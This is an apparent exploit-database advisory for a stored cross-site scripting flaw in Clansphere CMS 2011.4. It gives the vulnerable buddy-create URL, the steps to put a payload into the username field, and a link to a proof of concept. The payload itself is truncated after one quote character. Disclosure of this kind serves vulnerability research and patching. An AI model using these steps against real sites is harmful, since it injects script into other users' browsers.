# Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) # Exploit Author: Sinem Şahin # Date: 2022-10-08 # Vendor Homepage: https://www.csphere.eu/ # Version: 2011.4 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872 2- Write XSS Payload into the username of the buddy list create. 3- Press "Save" button. XSS Payload ==> " Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md